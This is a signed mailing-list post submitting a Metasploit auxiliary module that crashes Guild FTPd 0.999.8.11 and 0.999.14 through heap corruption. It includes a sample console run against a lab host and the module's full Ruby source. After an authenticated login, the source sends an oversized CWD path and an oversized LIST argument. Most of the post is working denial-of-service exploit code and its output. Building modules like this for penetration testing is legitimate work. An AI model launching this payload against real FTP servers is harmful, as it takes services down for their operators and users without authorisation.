-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hey guys,
I've attached a new DoS auxiliary module for Guild FTPd versions 0.999.8.11
and 0.999.14. It's based on the Python script from yesterday which says it
works for these versions, but I've only been able to test it on the latter.
This module needs the patch I sent a few minutes ago fixing banner grabbing in
Exploit::Remote::Ftp.
msf > use dos/windows/ftp/guildftp_cwdlist
msf auxiliary(guildftp_cwdlist) > set RHOST 192.168.10.2
RHOST => 192.168.10.2
msf auxiliary(guildftp_cwdlist) > set FTPUSER test
FTPUSER => test
msf auxiliary(guildftp_cwdlist) > set FTPPASS test
FTPPASS => test
msf auxiliary(guildftp_cwdlist) > run
[*] Connecting to FTP server 192.168.10.2:21...
[*] Connected to target FTP server.
[*] Authenticating as test with password test...
[*] Sending password...
[*] Sending commands...
[*] Auxiliary module execution completed
msf auxiliary(guildftp_cwdlist) > info
Name: Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
Version: 1
Provided by:
Kris Katterjohn <[EMAIL PROTECTED]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS test yes Valid FTP password for username
FTPUSER test yes Valid FTP username
RHOST 192.168.10.2 yes The target address
RPORT 21 yes The target port
Description:
Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap
corruption. You need to have a valid login so you can run CWD and
LIST.
Thanks,
Kris Katterjohn
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iQIVAwUBSPRBUP9K37xXYl36AQLsCg//WB/fVpEJez+Ox+dRp36vn2+nCGXatZMJ
i4LKcYfFOB/jh0IU4AQgQv/hwmIUwNooHw2TMmaG6LL2wnO8Iw1Pvr9G4S4/XqB1
V6Eah1f1WXOPxAehCaIihC0FqLljtjOFeCqT56B4Gi2pKyfctUitzSy6+irPwX4G
7e27gf4E2JeU/3eGUOahIh0a1988uZCy6GBNe6AwoSPsSLwFn+m4z3BqiGJ4TNsI
lll/AXToIytS7HpogGzcEuldU/EomOgH+YTTSWpL0DkPo/bhRW6fd02QzTqKmI+I
/M1X2V4k5L2VMGsPG19MJ8STGfZOVMnqSIJPwwXtcOcwNXmJO8AQcNZaOKX98rw9
oWBVHGin2IZzfyW3oJwvlab3aMVMgoheQoHQqQwjbDel/dX5vCwzEWmjChBur6By
JoS+K4BDIHdinb9B5lkKAPqWfRO3PtraIGk2mEuML+uKGCSHtts0nMqCW1p4+bPs
MtCbeJRqsI4SIK1Yls0A45mVK4Nb6IK2wShI2cJtgpV4+LHtYRexjAlJMliwXMPp
2YZi2ngWm55pLioEosnTI82EVU5qZMTr9N6HJKuD0sjfOUwyao1DIAsFmQdZAssm
wAr3D37g97YO9isNfXqkvWP1GU0wWTwKlxUW+wRlJ6osFZkyX5GvMx+UAsDpJgBI
/PegfNjeIOM=
=pHjH
-----END PGP SIGNATURE-----
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Guild FTPd 0.999.8.11/0.999.14
Heap Corruption',
'Description' => %q{
Guild FTPd 0.999.8.11 and 0.999.14 are
vulnerable
to heap corruption. You need to have a valid
login
so you can run CWD and LIST.
},
'Author' => 'Kris Katterjohn <[EMAIL
PROTECTED]>',
'License' => MSF_LICENSE,
'Version' => '1',
'References' =>
[ [ 'URL', 'http://milw0rm.com/exploits/6738']
],
'DisclosureDate' => 'Oct 12 2008'))
# They're required
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username',
'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password
for username', 'anonymous' ])
])
end
def run
connect_login
print_status("Sending commands...")
# We want to try to wait for responses to these
raw_send_recv("CWD #{'/.' * 124}\r\n")
raw_send_recv("LIST #{'X' * 100}\r\n")
disconnect
end
end
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
